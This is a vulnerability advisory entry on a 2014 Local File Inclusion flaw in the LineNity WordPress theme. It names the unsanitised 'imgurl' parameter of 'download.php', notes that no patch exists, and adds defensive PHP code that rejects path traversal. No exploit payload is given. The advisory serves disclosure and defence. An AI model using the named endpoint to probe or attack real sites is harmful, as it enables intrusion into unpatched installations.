Vendor: Linenity Clean Responsive WordPress Magazine
By: Felipe Andrian Peixoto
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 22
Product Name: Linenity Clean Responsive WordPress Magazine
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 and Linux
2014
Local File Inclusion in WordPress Theme LineNity
The vulnerability exists due to insufficient sanitization of user-supplied input in the 'imgurl' parameter of the 'download.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system. Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.
Mitigation:
Input validation should be used to prevent the exploitation of this vulnerability. It is also recommended to restrict access to the vulnerable script.
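One way to apply the input validation recommended above, as an added example that is not the theme's own code. It assumes 'imgurl' is meant to name an image file inside a single directory; `resolve_download_path()`, the `uploads` directory and the extension list are hypothetical.

```php
<?php
// Added example: hardened lookup for a download endpoint.
// resolve_download_path() and the uploads directory are hypothetical names.

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif'];

/** Map a user-supplied file name to a real path inside $baseDir, or null to refuse. */
function resolve_download_path(string $baseDir, string $requested): ?string
{
    // Reject empty input and NUL bytes.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // Accept a plain file name only: any directory component ("../", "/etc/")
    // makes basename() differ from the input.
    $name = basename(str_replace('\\', '/', $requested));
    if ($name !== $requested) {
        return null;
    }
    // Allow-list the extension so PHP source and config files are never served.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // Canonicalise and confirm the result is still under the base directory
    // (this also catches symlinks that point elsewhere).
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false || !is_file($real)) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Endpoint: read the parameter, refuse anything that does not resolve.
$raw  = $_GET['imgurl'] ?? '';
$path = resolve_download_path(__DIR__ . '/uploads', is_string($raw) ? $raw : '');
if ($path === null) {
    http_response_code(404); // do not echo the rejected input back
    exit;
}
header('Content-Type: application/octet-stream');
header('X-Content-Type-Options: nosniff');
readfile($path); // streams bytes; the file is never passed to include/require
```

Rejected requests (HTTP 404 from this endpoint with traversal sequences or non-image extensions in 'imgurl') are worth logging and alerting on.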